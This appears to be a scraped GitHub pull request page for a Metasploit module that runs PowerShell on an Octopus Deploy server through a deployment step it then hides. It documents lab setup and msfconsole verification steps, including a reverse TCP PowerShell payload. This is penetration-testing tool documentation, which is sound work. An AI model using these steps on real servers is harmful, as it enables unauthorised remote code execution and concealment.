Add module to execute powershell on Octopus Deploy server #8390
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
Octopus Deploy server allows users with the correct permissions to execute powershell code on the server during a deployment.
During an automated deployment initiated by this module, a powershell based payload is executed in the context of the Octopus Deploy server, which is running as either Local System or a custom domain account. This is done by creating a release that contains a single script step that is run on the Octopus Deploy server. The said script step is deleted after the deployment is started. Though the script step will not be visible in the Octopus Deploy UI, it will remain in the server's database (with lot's of other interesting data).
Options for authenticating with the Octopus Deploy server include username and password combination or an api key. Accounts are handled by Octopus Deploy (stored in database) or Active Directory.
More information about Octopus Deploy:
https://octopus.com
Server Setup
Set up Octopus Deploy server - No need to add accounts (end of step 2), or set up application packaging (step 3)
Create a test user/team - Create a team with "Project contributor" and "Project deployer", or just "System administrator" and add your test user.
Create an API key for your user for testing purposes
Example Runs
Username/Password
API Key
Verification
List the steps needed to make sure this thing works
msfconsole
use exploit/windows/http/octopusdeploy_deploy
PATH
,RHOST
,RPORT
, andSSL
if neededSTEPNAME
if desiredUSERNAME
andPASSWORD
or justAPIKEY
set payload windows/powershell_reverse_tcp
LHOST
run
USERNAME
/PASSWORD
andAPIKEY
)STEPNAME
or a random identifier is used for the name of the deployment step added by the module